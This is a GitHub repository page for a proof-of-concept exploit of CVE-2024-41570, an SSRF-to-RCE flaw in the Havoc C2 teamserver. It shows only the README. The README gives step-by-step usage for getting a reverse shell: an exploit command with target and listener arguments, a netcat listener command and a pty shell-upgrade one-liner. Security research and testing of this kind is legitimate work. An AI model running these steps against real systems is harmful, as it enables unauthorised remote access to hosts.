Skip to content
/ CVE-2024-41570 Public

Automated Reverse Shell Exploit via WebSocket | Havoc-C2-SSRF with RCE

License

MIT license
5 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

kit4py/CVE-2024-41570

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
exploit.py
exploit.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

CVE-2024-41570 | Havoc C2 SSRF with RCE | Automated Reverse Shell Exploit via WebSocket

This project provides a Python-based proof-of-concept (PoC) script to exploit a vulnerable WebSocket-based service. The script automates agent registration, WebSocket payload delivery, and remote command execution to establish a reverse shell.

Features

  • Registers an agent to the target service.
  • Opens a WebSocket and sends handshake and authentication payloads.
  • Executes commands remotely via a reverse shell.
  • Provides a guided workflow with clear instructions.

Prerequisites

  • Python 3.x installed on your machine.
  • Install required dependencies by running: 
    pip install -r requirements.txt

Installation

  1. Clone this repository: 
    git clone https://github.com/<your-repo-name>.git
  2. Navigate to the project directory: 
    cd CVE-2024-41570
  3. Install dependencies: 
    pip install -r requirements.txt

Usage

Run the script with the required arguments:

python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>

Arguments

  • -t: Target URL of the WebSocket server.
  • -i: IP address of the Team Server form Havoc.
  • -p: Port for the Team Server from Havoc.
  • -U: Username for WebSocket authentication.
  • -P: Password for WebSocket authentication.
  • -l: Listener IP for the reverse shell (your machine).
  • -L: Listener port for the reverse shell (your machine).

Example Command

python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444

Steps to Execute

  1. Ensure the target service is running and vulnerable.
  2. Run the script with the required parameters.
  3. In a separate terminal, start a listener: 
    nc -lvnp <listener_port>
  4. Upgrade shell: 
    python -c 'import pty; pty.spawn("/bin/bash")' 
export TERM=xterm-256color
stty rows 67 columns 318

Dependencies

The script requires the following Python libraries:

  • requests
  • pycryptodome

Install them using the command:

pip install -r requirements.txt

Security Notice

This script is intended for educational purposes only. Ensure you have explicit authorization to test the target system. Misuse of this script may violate laws and ethical guidelines.

References

Inspired by Default Havoc Poc

Contributing

Contributions are welcome! Feel free to fork the repository and submit a pull request.

License

This project is licensed under the MIT License. See the LICENSE file for details.

About

Automated Reverse Shell Exploit via WebSocket | Havoc-C2-SSRF with RCE

Topics

havoc havoc2 havocframework havocexploit havoc-rce

Resources

Readme

License

MIT license
Activity

Stars

5 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages